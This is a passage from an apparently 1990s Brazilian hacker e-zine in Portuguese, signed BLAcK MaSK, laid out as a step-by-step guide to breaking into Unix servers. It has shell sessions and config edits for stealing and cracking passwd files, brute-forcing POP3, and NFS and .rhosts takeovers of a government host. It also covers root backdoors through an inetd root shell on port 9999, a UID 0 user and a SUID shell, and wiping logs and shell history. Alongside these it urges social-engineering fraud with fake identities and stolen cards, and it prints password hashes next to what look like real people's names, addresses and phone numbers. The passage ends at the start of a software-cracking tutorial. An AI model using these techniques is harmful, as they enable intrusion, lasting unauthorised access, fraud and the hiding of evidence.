Name Server, eh claro, segue algumas regras proprias. Quais sao? Nao vou dizer
pois isto jah eh algo bem mais avancado e este nao eh o proposito deste texto
(voce leu o titulo dele?), entao, se quiser aprender mais, procure textos
sobre TCP/IP, RFCs ou compre um livro. Faca isto agora, nao deixe para depois,
pois senao voce nunca aprenderah algo mesmo. Nao espere que tudo venha de
graca para voce.

Bem, pra descobrir o numero IP, sabendo o seu DNS ou vice-versa digite no seu
cliente de IRC : "/dns www.target.sux.br" ou "/dns 200.200.200.200" sem aspas
neh..

2- Pegue o seu melhor programa para scannear hosts e mande fogo! Recomendo o
HakTek para scannear portas e o Host Scan para devices, outros hosts ou
quando um mesmo provedor utiliza-se de ip aliasing e/ou hosts virtuais. Que
diabos eh isso? Bem, isto serve pra voce associar diferentes dominios
proprios para sites FTP ou WWW a uma mesma maquina. Entao, o site
www.gavioes-fiel.com.br e o www.corinthians-timao.com.br podem estar na mesma
maquina, em diretorios diferentes. Ambos os programas (HakTek e Host Scan)
disponiveis em : www.blackmask.base.org

3- Se tiver FTP (porta 21), abra uma sessao de FTP anonima. Tente pegar o
passwd do dir /etc. Normalmente nao conseguirah.. hehehe... Mas se pegar um
passwd por ftp anonimo como este abaixo:

root:*:0:0:Super Admin:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:
games:*:12:100:games:/usr/games:
gopher:*:13:30:gopher:/usr/lib/gopher-data:
ftp:*:14:50:FTP User:/home/ftp:
nobody:*:99:99:Nobody:/:
paulmacartney:*:500:500:Beatles Singer:/bin/csh
xuxa:*:501:500:Xuxa:/bin/xsh
superhacker:*:0:0:Raquer Idiota que pos backdoor no passwd:/bin/hacksh

Tambem nao adianta porque este nao eh o arquivo original! Eles estao
utilizando uma tecnica conhecida como password shadowing. Se quiser tentar
pegar o file /etc/shadow fique a vontade... Ele eh 400 por default e o admin
nao vai ser tao idiota de deixar world readable.. Quer dizer.. espere por
isso, vah em frente e tente pegar..

Se voce pegar outro passwd assim:

root::0:0:Super Admin:/root:/bin/bash
bin::1:1:bin:/bin:
daemon::2:2:daemon:/sbin:
adm::3:4:adm:/var/adm:
lp::4:7:lp:/var/spool/lpd:
sync::5:0:sync:/sbin:/bin/sync
shutdown::6:0:shutdown:/sbin:/sbin/shutdown
halt::7:0:halt:/sbin:/sbin/halt
mail::8:12:mail:/var/spool/mail:
news::9:13:news:/var/spool/news:
uucp:10:14:uucp:/var/spool/uucp:
operator::11:0:operator:/root:
games::12:100:games:/usr/games:
gopher::13:30:gopher:/usr/lib/gopher-data:
ftp::14:50:FTP User:/home/ftp:
nobody::99:99:Nobody:/:

Espero que voce tenha sido um pouco inteligente e tenha percebido que o root
nao tem senha! Voce jah deve estar contente neh? Entao voce que perdeu tempo
tambem... Normalmente o passwd que tem em ftps anonimos eh soh pro daemon
funcionar corretamente, e nao eh necessario que exista o dir /etc nem outro
do sistema. Depende da configuracao do ftp e a partir de que dir o ftp eh
mountado.

Mas voce pegou o passwd assim:

root:CFvMgywOZGMnQ:0:0:Super-User:/:/bin/csh
EZsetup:q9gEwDwC5kzI6:992:998:System Setup:/var/sysadmdesktop/EZsetup:/bin/csh
demos:yAhP54dCf./MM:993:997:Demonstration User:/usr/demos:/bin/csh
OutOfBox:FA.Wzh1JMNtus:995:997:Out of Box Experience:/usr/people/tour:/bin/csh
guest:SBIkWEWfKbPpg:998:998:Guest Account:/usr/people/guest:/bin/csh
4Dgifts:O9614g8TISaTY:999:998:4Dgifts Account:/usr/people/4Dgifts:/bin/csh
jorge:NkID8Id3/fUio:50:20:Jorge Apostolos Siarcos:/usr/people/jorge:/bin/tcsh
celso:QRRmurmyWFcQ.:51:20:Celso Chiarelli:/usr/people/celso:/bin/tcsh
mauro:s.mVa89isEJ/g:52:20:Mauro Mendes Warnecke,(041) 322-2600:/usr/people/mauro:/bin/tcsh
romi:o3qNjw8.maORs:53:20:Romicarla Matos,R. Pasteur, 279 - Batel - Ctba PR,041-3220704,,,,,Pastoral da Crianca:/usr/people/romi:/bin/tcsh
pac:jQfslD9fw8hBg:54:20:Paulo Arns da Cunha,R. 24 de Maio, 135 Ctba PR,041-3222600:/usr/people/paulo:/bin/tcsh
pastcri:9eJMTempEm5UE:55:20:Coordenacao Nacional da Pastoral da Crianca da CNBB,Rua Pasteur,279 Ctba - PR,041-322.0704,,,,,Pastoral da Crianca:/usr/people/pastcri:/bin/tcsh
nneumann:G/MBZqVVjTBCA:56:20:Nelson Arns Neumann,Rua Pasteur,279 Ctba - PR,041-322.0704,,,,,Pastoral da Crianca:/usr/people/nneumann:/bin/tcsh
rebidia:xhE22GZuKVDtk:57:20:Rede Brasileira de Informacao e Documentacao Sobre a Infancia e Adolescencia,Rua Pasteur,279 Ctba - PR,041-322.0704,,,,,Pastoral da Crianca:/usr/people/rebidia:/bin/tcsh

Fique muito contente pois teve muita sorte mesmo! Agora pegue sua melhor
wordlist, o bom e velho john e quebre as senhas... Pule para o proximo item.

Okz, agora suponhamos que voce pegou o passwd mas ele era como os dois
primeiros que mostrei acima e voce nao sabe mais o que fazer. Vou ser
diferente dos outros caras que soh escrevem ateh aqui e aih se a pessoa nao
sabe o que fazer e chamam ela de lammer. Espero que voce tambem nao seja um
lammer e saiba ir em frente sem que tenha q ficar seguindo passos.

Primeiro obtenha uma lista de todos ou de boa parte dos usuarios do
provedor-alvo. Procure na hp deles ou tente fingar o provedor. Depois tente
logar-se no provedor e vah chutando senhas. Eh melhor chutar senhas pelo
programa de mail, embora tenha que se mudar a configuracao a cada nova
tentativa de login diferente. Alguns provedores derrubam a conexao apos X
tentativas de login pelo terminal(telnet ou ligacao normal), por isso eh
melhor usar o programa de mail. Se voce tiver linux aih vai a fonte de um
programa chutador de senhas de mail(normalmente senhas de mail sao iguais as
de shell ou conta de internet) Tipo, mas nao exagera nas tentativas tah? TUDO
fica logado e se admin tiver um pingo de QI na cabeca deve checar os logs
diariamente! (ateh parece piada.. hehehe)

Retirei isto da THTJ.
Usa assim :


[root@BLAcK_MaSK-OS /]# pop3 target.sux.br lista-de-logins-dos-users wordlist


PS: Coloque uma wordlist pequena, soh com as palavras mais conhecidas, logins,
numeros em sequencia, etc.. Jah dah pra perceber um bom retorno.

-------------------------- pop3hack.c --------------------------
 fonte atachada ao zine.. dir sources/
-------------------------- pop3hack.c --------------------------


PS.: Se houverem problemas durante a compilacao ou execucao deste programa,
tente usar os brute forces do pessoal do NearZ (FTP e POP3), que tambem sao
bons. www.nearz.home.ml.org - edicao #05.

Se conseguiu algumas senhas, otimo! Se nao, continue tentando! Seja
persistente! Nao desista!

Seja criativo, use engenharia social! Ligue pra pessoa e se faca passar pelo
admin do provedor e invente uma boa historia pra ela te dar a senha dela. Se
nao sabe o numero do tel dela mande um email alugando sobre uma promocao ou
dizendo que ela deve trocar a senha para "novasenha" por motivos de
seguranca e
tal... Use sua inteligencia, simpatia e criatividade! Em provedores grandes
eh possivel a criacao de novas contas pela propria NET, entao, crie uma com
um cartao de credito falso com um login nao suspeito, como Promocao,
NomeDoProvedor, e mande os mails a partir desta conta. Nunca da sua propria!
Voce pode ligar pro provedor e dizer que eh de uma empresa (passe todos os
seus dados; seu nome, CGC, ICMS, razao social, etc. eh claro que falsos neh!)
e inventar que gostaria, se possivel, de obter uma lista dos usuarios do
provedor para criar uma mala direta da sua empresa e enviar pros coitados.
Seja educado e nao gagueje.. Em algumas lojas de eletronicos, existem
distorcores de voz a venda. Neste tipo de hack, sempre procure passar uma
imagem de confianca e idonea de voce. Se voce entendeu tudo o que eu falei e
praticou, perceberah que eh MUITO mais facil e rapido de se entrar num sistema
deste modo. Pessoas sao hackeadas mais facilmente, ou porque sao ingenuas
quanto a high tech technologies ou porque a engenharia social ainda eh muito
pouco usada aqui no pais. O motivo principal porque os computadores serao
sempre inseguros eh porque serao sempre operados por humanos. (Serah? Seria o
cumulo ver uma maquina sendo operada por outra... hehehehe)

Tente ver se o sistema a ser atacado possui diretorios exportado para leitura
ou gravacao de todos, muitos sistemas ainda estao a merce deste ataque,
principalmente aqueles governamentais em que o admin loga-se uma vez por ano.


[root@BLAcK_MaSK-OS /]# showmount -e cxxxxxxxxxxx.gov.br
/bin  router1.cxxxxxxxxxxx.gov.br
/etc  router1.cxxxxxxxxxxx.gov.br
/home (everyone)
/usr  router5.cxxxxxxxxxxx.gov.br

[root@BLAcK_MaSK-OS /]#


Tomei a precaucao de alterar todos os nomes e dados do servidor nesta
demonstracao porque tenho medo de que me rastreiem e os federais venham aqui
em casa para me prender e levar meu PC... hahahahahahaha
Como voce viu, qualquer pessoa poderah ter acesso aos dirs com (everyone)
apenas mountando-os por NFS !!!


[root@BLAcK_MaSK-OS /]# mkdir /tmp/hacked
[root@BLAcK_MaSK-OS /]# mount -nt nfs cxxxxxxxxxxx.gov.br:/home /tmp/hacked
[root@BLAcK_MaSK-OS /]# cd /tmp/hacked
[root@BLAcK_MaSK-OS /]# ls -al
   total 63
   1 drwxr-xr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwx------  24 john     john         2424 Jun 24 23:24 john
   1 drwx------   9 marylu   marylu       3421 Sep  7 12:00 marylu
   1 drwx------   7 barbie   barbie       2049 Feb 21 15:47 barbie
   1 drwx------  33 kevin    kevin        8712 Dec 25 00:00 kevin

[root@BLAcK_MaSK-OS /]#


Bem, agora voce poderah pegar tanto o passwd como o shadow simplesmente!!!
Nem tao simplesmente.. heheh Uma das poucas precaucoes que o pessoal da Sun
tomou foi a de impedir que arquivos de propriedade do root sejam modificados,
lidos ou executados (a menos que as proprias permissoes permitam - o contrario
do /etc/shadow por exemplo). Mas, quanto ao resto dos arquivos, para se ter
acesso basta que voce esteje logado na TUA maquina como ele proprio...


[root@BLAcK_MaSK-OS /]# adduser barbie
[root@BLAcK_MaSK-OS /]# su - barbie
[root@BLAcK_MaSK-OS barbie]$ cd /tmp/hacked
[barbie@BLAcK_MaSK-OS /]$ cd barbie
[barbie@BLAcK_MaSK-OS /]$ ls -al
   total 63
   1 drwxr-xr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwx------  13 barbie   barbie       1024 Oct  8 13:42 mail/
   1 drwx------  13 barbie   barbie       1024 Oct  8 13:42 photos/
   1 -rwxr-xr-x   1 barbie   barbie        515 Feb 21 15:47 .bash_history
   1 -rwxr-xr-x   1 barbie   barbie        142 Feb 21 15:47 .bash_logout
   1 -rwxr-xr-x   1 barbie   barbie        220 Feb 21 15:47 .bash_profile
   1 -rwxr-xr-x   1 barbie   barbie         49 Feb 21 15:47 .forward

[barbie@BLAcK_MaSK-OS /]$ echo ++ >> .rhosts
[barbie@BLAcK_MaSK-OS /]$ ls -al .rhosts
   1 -rwxr-xr-x  22 barbie   barbie         22 Aug 03 02:15 .rhosts
[barbie@BLAcK_MaSK-OS /]$ rlogin -l barbie cxxxxxxx.gov.br

[barbie@exxxxx barbie]$


Agora jah estamos dentro de mais um sistema. Nao somos root (ainda), mas com
uma shell jah se tem meio caminho andado... A partir daqui existirao milhares
de maneiras de se rootiar.

4- Com a senha de alguem tente "ftpear" ou telnetar pro provedor novamente.
Dependendo da seguranca do sistema voce terah muito mais acesso a diretorios
e files. Tente reunir o maximo de informacoes possiveis: diretorios, logs,
sistemas operacional, versoes de programas como daemons, sendmail, pine, etc.

5- Procure e rode exploits. Faca upload deste por ftp e rode por telnet ou
modifique um arquivo de inicializacao de algum programa como o .profile ou
.forward pra compilar o exploit e rodar. Os exploits tem que ser rodados na
maquina a ser atingida.

6- Se ainda nao conseguir id 0 continue tentando... Procure sempre por novos
bugs. A Rootshell eh um bom comeco.

7- Apos pegar root, instale uma boa backdoor.

Yeah, you've ID 0! Parabens, voce merece! Mesmo que a senha do root seja
muito estupida, mas voce nao tem nada a ver com isso, voce desempenhou bem o
seu papel. Agora eh soh manter o que voce jah conseguiu. Vou demonstrar apenas
alguns dos modos mais comuns de assegurar sua reentrada ao sistema, mesmo o
admin ter mudado as senhas, o endereco e o telefone do provedor (acho que
exagerei.. :p), sem precisar descobrir nenhuma senha novamente e ter mais um
monte de trabalho. Bem, estas tecnicas sao chamadas de um modo geral de
backdoors, ou seja, backdoor eh algo, arquivo que voce modifica ou programa
(trojans) que voce instala para obter o acesso de root novamente, de um modo
simples, facil e economico.

Algumas tecnicas jah foram citadas e explicadas em varios outros zines, como
Axur05, RWX, HackPHR, NearZ, etc.. Por isso, apenas vou citar rapidinho estes
modos. Lembre-se, se voce conhece o sistema operacional no qual estah agindo,
nem precisa ler as porras destes textos, porque jah vem mil ideias a cabeca...
Mas se ainda nao eh um guru, acho bom dar uma lida..



--= ADICIONANDO UM USUARIO PRIVILEGIADO (no bom sentido eh claro) =--

Bom, este modo soh funciona em provedores com admins retardados e/ou muito,
mas muito burros mesmo! Soh faca isso em caso de desespero.

No prompt digite:


[root@NAVY SYSTEM /]# adduser hack0


Aih, serao solicitadas algumas informacoes sobre o novo user "hack0",
tais como, shell, uid, gid, dir home, etc. Entao, na hora de digitar a UID e
GID, digite 0. Isto tornarah o "hack0" como um root alternativo. Mas,
lembre-se : Soh faca isto caso nao saiba + o que fazer.. Alem disso, acho
isto lamah.. mas cada um sabe o que faz, se quiser adicionar shells pra todos
os seus amiguinhos raquers do IRC, faca! Problema eh seu e nao tenho nada a
ver com isso.


PS: Se achar mais legal, edite o /etc/passwd e adicione manualmente o novo
usuario.


Tah, nao seja burro e pense num jeito diferente de ter um user adicionado ao
sistema soh pra voce... Pensou? Nope? OKz. Vou mostrar do mesmo jeito.
Digamos que o passwd do seu alvo eh este:


root:Iqe/.MYhhDnjw:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
nobody:*:99:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shimomura:hKV7/CHq6MxUA:501:0:Tsutomu Shimomura:/home/benatti:/bin/bash
nomuro:Dj6m/Uav5YqYM:502:100:Taka Racha Nomuro:/home/cleber:/bin/bash
tekomi:JjGnrxNlFqirU:512:100:Nabu Tekomi:/home:/bin/bash


Entao, ao inves de adicionar um user ou modificar um outro pondo id 0, vamos
apenas tirar o "*" da senha do user 'games' por exemplo:


root:Iqe/.MYhhDnjw:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games::12:100:games:/usr/ganes
man:*:13:15:man:/usr/man:
nobody:*:99:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shimomura:hKV7/CHq6MxUA:501:0:Tsutomu Shimomura:/home/benatti:/bin/bash
nomuro:Dj6m/Uav5YqYM:502:100:Taka Racha Nomuro:/home/cleber:/bin/bash
tekomi:JjGnrxNlFqirU:512:100:Nabu Tekomi:/home:/bin/bash


O asterisco diz que o user nao tem senha e nao pode logar-se no sistema.
Normalmente este, e outros users sao utilizados apenas em funcoes internas do
sistema, como por exemplo o "user" ftp que encontra-se no passwd server
apenas para permitir que haja ftp anonimo. Agora voce viu que o user games
nao tem senha nem asterisco e voce poderah logar-se com ele a qualquer hora
(percebeu que a shell dele tambem foi modificada?) Aconselho optar pela nova
shell "ganes" copiando-se a shell padrao mas NAO tornah-la suid (explicado
adiante) pois se o admin tiver olhos de aguia e descobrir voce perderah duas
backdoors com uma cajadada soh. Remember: uma shell eh o que basta para voce
dominar o sistema novamente.

--= ADICIONANDO OU MODIFICANDO UM SERVICE =--

Esta outra tecnica jah eh um pouco melhor que a anterior, mas ainda deixa a
desejar. O que voce farah eh modificar os arquivos de configuracao dos
servicos TCP/IP para que algum deles deixe sua funcao habitual para se
tornarem shells root.
Primeiro, uma pequena explicacao sobre os files que voce irah alterar. O
/etc/services define TODOS os servicos do protocolo TCP/IP, incluindo seu
nome, porta usada e protocolo. O /etc/inetd.conf define apenas os servicos que
estarao DISPONIVEIS ao INETD. Este file contem o nome do service (que eh
definido no /etc/services), como executarah, daemon de controle e que loga as
conexoes, etc.)
Vou tomar como exemplo a configuracao da minha maquina:


---- services ----
ftp		21/tcp
telnet	23/tcp



---- inetd.conf -----
# These are standard services.
#
ftp     stream    tcp   nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream    tcp   nowait  root  /usr/sbin/tcpd  in.telnetsnoopd


Esta eh a forma normal dele. Como voce jah deve ter percebido, voce pode
mudar qualquer service e executar qualquer comando no lugar do daemon de
controle. Bem, entao vamos "backdoorear" este file...
Neste exemplo, vou adicionar outro servico numa porta alta (9999),
chamado "fastroot".

---- services ----
ftp		21/tcp
telnet	23/tcp
fastroot    9999/tcp



---- inetd.conf -----
# These are standard services.
#
ftp	 stream  tcp	 nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet   stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetsnoopd
fastroot stream  tcp     nowait  root    /bin/sh         /bin/sh -i


O bom desta backdoor eh que voce loga-se direto como root, sem o famoso
"login:". Nada fica logado pois retira-se o daemon tcpd que eh encarregado de
logar as conexoes. Daih, eh soh telnetar para essa porta e voce se tornarah
root imediatamente!

[root@BLAcK_MaSK-OS /]# telnet target.sux.br 9999
Trying XXX.XXX.XXX.XXX
Connected to target.sux.br
Escape character is '^]'.
bash#

ou ainda:

[root@BLAcK_MaSK-OS /]# telnet target.sux.br fastroot
Trying XXX.XXX.XXX.XXX
Connected to target.sux.br
Escape character is'^]'.
bash#


--= SUID SHELL =--

Um dos modos mais simples, mais faceis e mais rapidos de se garantir o
retorno ao servidor como root. Basta voce tornar a shell, alterando os
atributos, para rodar com as propriedades do root. Mais info vide HackPHR #05
(www.hackphr.home.ml.org)

No prompt digite:


[root@Nasa Sytem / ]# chmod u+s /bin/hacksh


Depois, eh soh se logar como um user comum no sistema e executar a suid shell.


--= TROJAN HORSES COMO BACKDOORS =--

Este eh o meu tipo preferido, pois voce modifica um programa comum, para que
atraves duma senha ou atributo especial ele te de uma shell root. Fica muito
dificil do admin percebe-la e voce poderah garantir o retorno sem se
preocupar por alguns bons anos... A nao ser que o admin seja inteligente e use
programas de checksum ou timestamp, como o "sum" ou MD5"... hahahaha. Mais
infos e sources, vide HackPHR #05!


8- Apague seus "rastros".

Este eh um ponto primordial para que voce saiba e nao seja pego facilmente!
Todos sabem, ou deveriam saber que quase tudo o que voce faz num sistem UNIX
eh logado, menos as tentativas de login falhadas (talvez este seja um dos
maiores pecados do UNIX). Eh MUITO importante saber apagar os logs corretos e
apenas os necessarios. Voce nao vai querer dar um "rm -Rf /var/log" pois isto
facilitarah ainda mais para o admin saber que o seu sistema foi invadido. Se
voce apagar os logs manualmente, eh importante que voce os crie de volta,
usando o comando "touch" do UNIX. Se for usar algum programa especifico para
isto, lembre-se de alterar o source e colocar a path correta dos logs.
Normalmente (eu disse NORMALMENTE), quase todos os logs estao neste diretorio
/var/log, mas se voce usa a Bourne Shell (sh ou bash), NAO esqueca de apagar
o .sh_history que fica no dir home! Ele grava todos os seus comandos e, em
alguns sistemas, soh eh updateado apos o encerramento da conexao, isto eh,
mesmo que voce edite este file, nao verah os comandos da sessao atual! Por
isso, muitas vezes terah que relogar-se para apaga-lo. Para quem ainda tem
duvidas, vou fazer uma rapida simulacao...


[root@UOL home]# gcc -o zap2 zap2.c
[root@UOL home]# zap2 joazinho
Zap2!
[root@UOL home]# zap2 root
Zap2!
    {* Agora nao precisamos se preocupar mais com o wtmp, utmp e lastlog. *}
[root@UOL home]# cd etc
[root@UOL etc]# cat syslog.conf
*.=info;*.=notice                               /var/log/messages
*.=debug                                        /var/log/debug
*.warn                                          /var/log/syslog
*.warn                                          /root/syslog
mail.*;mail.!=info                              /root/maillog
mail,news.=info                                 /root/info
mail.*;mail.!=info                              /var/log/mail
mail,news.=info                                 /var/log/info
*.alert                                         root,joaozinho
*.=info;*.=notice                               @router2.uol.com.br
*.=debug                                        @router2.uol.com.br
*.warn                                          @router2.uol.com.br
mail.*;mail.!=info                              @router2.uol.com.br
mail,news.=info                                 @router2.uol.com.br
        {* Tome muito cuidado com o que voce faz! Alguns logs estao indo pro
outro roteador da UOL! Sempre cheque o /etc/syslog.conf pois alguns admins
normais guardam os logs em diretorios diferentes ou com outros nomes e mantem
os logs padroes apenas para confundir e voce pensar que estah tudo certo...*}

[root@UOL etc]# cat login.defs
#   Directory where mailboxes reside, _or_ name of file, relative to the
#   home directory.  If you _do_ define both, MAIL_DIR takes precedence.
#   QMAIL_DIR is for Qmail
#
#QMAIL_DIR	Maildir
MAIL_DIR	/var/spool/mail
#MAIL_FILE	.mail
#
# Require password before chfn/chsh can make any changes.
#
CHFN_AUTH		yes
# Enable "syslog" logging of su activity - in addition to sulog file logging
# SYSLOG_SG_ENAB does the same for newgrp and sg.
#
SYSLOG_SU_ENAB          yes
SYSLOG_SG_ENAB          yes
#
# If defined, all su activity is logged to this file
#
SULOG_FILE      /var/log/sulog
        {* Bom, vamos dar uma lida nos mails dos users e procurar por senhas
que possam estar escritas em plain text.. hehehe... se usarmos o su, devemos
apagar o /var/log/sulog tambem. *}

[root@UOL etc]# cd /var/spool/mail
[root@UOL mail]# ls
root     joaozinho     admin     travolta    backup    postman    shimomura    
[root@UOL mail]# grep password *
shimomura: 1979: Well, your shell acount was created, use login:travolta and
password:atlovart, but don't forget to ...

[root@AOL mail]# cat root|more
From : alert@nsa.gov
To : root@uol.com.br
Subject : Emergency - Worm v2.0 Released
bla bla bla bla bla bla bla bla bla 
bla bla bla bla bla bla bla bla bla 
^C
        {* As vezes eh legal ler os mails dos usuarios, sai cada coisa... Se
voce simplesmente der um cat no file que contem os mails de cada user (mail
file=login), voce poderah ler os mails deles, ninguem saberah e eles ainda
poderao receber os seus mails. *}
[root@UOL mail]# cd /var/log
        {* Let's erase anothers logs. *}
[root@UOL log]# grep hackphr.org *       {* Onde hackphr.org voce poe o
teu proprio provedor *}
messages:Aug 19 21:19:50 localhost named[222]:sysquery: query(hackphr.org)
xferlog:Sun Aug 13:49:20 1998 1 localhost 220 /root/splitvt.c _ i r
travolta ftp 0 *
^C
        {* WoW! Viu como soh rodar a porra dum script para apagar os logs nao
adianta nada? Estes logs voce poderah editar com qualquer editor (vi, pico,
joe, etc)... Mas e se o log tiver uns 9 ou 10 MB? Voce perde uns 20 minutos
pra apagar todas as suas entrada? Nao, voce le a HackPHR! ;) *}
[root@UOL log]# grep -v hackphr.org > xferlog.bkp
        {* O 'grep' voce jah conhece neh?! O atributo '-v' faz com que seja
procurado por todas as linhas que NAO contenham hackphr.org, e a seguir eu
faco o redirecionamento a outro arquivo. *}
[root@UOL log]# rm -f xferlog
[root@UOL log]# mv xferlog.bkp xferlog
[root@UOL root]# cat .bash_profile
# .bash_profile
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
        . ~/.bashrc
fi

# User specific environment and startup programs
PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME="root"
HISTFILE=/etc/logrotate.d/.bingo
export USERNAME ENV PATH HISTFILE

mesg n
        {* Aqui vemos outro exemplo legalzinho de que voce pode se phuder se
nao for extremamente cuidadoso! Neste o admin guarda o .history em um
diretorio abaixo de qualquer suspeita e com outro nome... Quando estiver
hackeando, tente pensar como se fosse o admin, mas cuidado para nao regredir..
hehehe... duh duh dah dah *}

[root@UOL root]# unset HISTFILE
        {* Isto aqui faz com que o seu .history seja deletado apos voce se
desconectar. Eh muito melhor voce dar este comando do que linkar o .history
ou .bingo neste caso, ao /dev/null por exemplo, pois esta alteracao fica
muito visivel ao admin. *}
[root@UOL root]# exit
Use "logout" to leave this shell.
[root@UOL root]# logout
Bye! Cya later!

Connection terminated by foreign host.
[root@BLAcK_MaSK-OS /]#


E aqui vai um programa q apaga apenas os PRINCIPAIS logs automaticamente.
Antes de compilar, chece se as paths dos logs estao corretas.

-------------------------- zap2.c --------------------------
 fonte atachada ao zine.. dir sources/
-------------------------- EOF zap2.c --------------------------


E aqui vai um script em perl para voce fazer o que quiser com o file utmp...
Bom para ferrar otarios do IRC.. hahaha


-------------------------- utmpman.pl --------------------------
 fonte atachada ao zine.. dir sources/
-------------------------- EOF utmpman.pl --------------------------


PS. : EH EXTREMAMENTE IMPORTANTE QUE APOS VOCE MODIFICAR OS LOGS, VOCE
REINICIE O SYSLOGD PARA QUE AS ALTERACOES TENHAM EFEITO!!! Bem, em alguns
casos nao, mas por via das duvidas..


[|{ L4st W0rds }|]

Se voce tiver duvidas, comentarios, algo a adicionar ou criticas
"construtivas" nao hesite em perguntar a mim por email ou pelo IRC.
(black_mask@usa.net - #hackphr Brasnet)

Bem, termino por aqui.. Espero que voce tenha aproveitado um pouco deste
texto e, deixe de ser um newbie ou ateh mesmo lamer.. Se voce gostou mesmo,
passe este texto para todos os seus amigos, para que eles tambem possam
aprender e crescer junto com voce. Nao seja egoista, querendo todo o
conhecimento pra voce e sonegando ajuda a quem QUER aprender.. Faca a sua
parte, assim como eu fiz a minha. Vamos formar uma legiao de ELITE BOYS no
BRASIL, para que nao percamos tao feio pros filhas das putas dos americanos e
ingleses!!!


            ~~~~~~ DEDICADO A COMUNIDADE UNDERGROUND BRASILEIRA ~~~~~~       



                              +++BLAcK MaSK+++


#bash ^D

Connection terminated by foreign host.

   
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 03 - Let's Crack!
                  
    tOneOne
                     -


1 - Comecando
  
2 - Ferramentas
  2.1 - O editor Hexadecimal 
  2.2 - O Debugger
  2.3 - O compilador
  2.4 - O descompilador
  2.5 - Calculadora, papel e caneta

3 - O programa
  3.1 - A plataforma
  3.2 - A linguagem
  3.3 - Encriptacao

4 - O Crack
  4.1 - O Tipo do crack
  4.2 - Crack Simples
  4.3 - Crack em ASM
  4.4 - Engenharia reversa
  4.5 - Crack no registro
  4.6 - Crack no .INI
  4.7 - No CD

5 - O cracker
  5.1 - Cracker simples
  5.2 - Key Generator
  5.3 - Algoritmo

6 - Treinando
  6.1 - Programas
  6.2 - Crack-me
  

7 - Tabela HexaDecimal

8 - URLs

9 - Lazt words

-------- ----- -----  -----   ----      ---    --     -      -       -

1 - Comecando

Eh ne... vamos comecar, antes de tudo, vou deixar bem claro que isso nao e um
tutorial e sim um resumo do que voce devera saber, e ter para fazer seus
proprios cracks. Por isso naum pense q vc vai ler esse texto e sair crackeando
tudo por ai.

Voce tambem tera que ter conhecimento e pratica em alguns pontos como
programacao, ASM, etc...



2 - Ferramantas

  2.1 - O editor HexaDecimal

  Um dos tipos de programas q mais tem na internet sao os editores
  HexaDecimais, se vc jah ta acostumado com algum , BLZ, mas se naum tiver,
  uma boa escolha eh o Hex Workshop ou o Hiew.

  A visao do editor eh +- assim:

  0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ................
  
  Onde os numeros sao os valores em hexadecimal do texto escrito onde tem os
  pontos, como no exemplo abaixo.

  000B 3C10 0A00 0044 4343 2047 6574 206F 6620 2573 ...DCC Get of %s

  Alguns macetes na edicao HexaDecimal sao:

  - Geralmente onde tem texto legivel, pode ser mudado
  - Quando aparece alguma coisa tipo %s, eh uma variavel
  - Os textos ilegiveis geralmente sao partes unicas para a execucao do
    programa, e se vc mudalos sem saber o q esta fazendo, o programa
    simplesmente nao rodara.
  - Cada linguagem de programacao tem um codigo diferente, ou seja, eh bom
    observer o executavel das linguagens para saber qual parte deles faz o q

  A edicao HexaDecimal eh o baxico do basico para se comecar ah crackear.

  2.2 - O Debugger

  Outra "arma" que eh necessaria para se crackear, eh o debugger, q eu
  aconselho a mesma coisa do editor HexaDecimal, se vc jah tem um e gosta de
  usa-lo, continue usando-o.

  Mas o melhor que existe atualmente eh o SoftIce, que tem suas versoes para
  DOS, Win 95 e Win NT.

  O SoftIce nao tem uma interface muito amigavel, mas com o tempo vc pega os
  macetes...

  Ele funciona sendo carregado quando o Windows eh desligado, e quando se
  volta ao desktop, o SoftIce jah esta ativo.

  Para chama-lo basta apertar CTRL+D ou F5 e entao aparecera uma tela assim:
   ____________________
  |   Registradores    |
  |--------------------|
  |  Janela de Dados   |
  |--------------------|
  |  Janela de Codigo  |
  |--------------------|
  | Janela de comandos | <= Aki vc digita os comandos :)
  |--------------------|

  As teclas mais importantes no SoftIce sao:

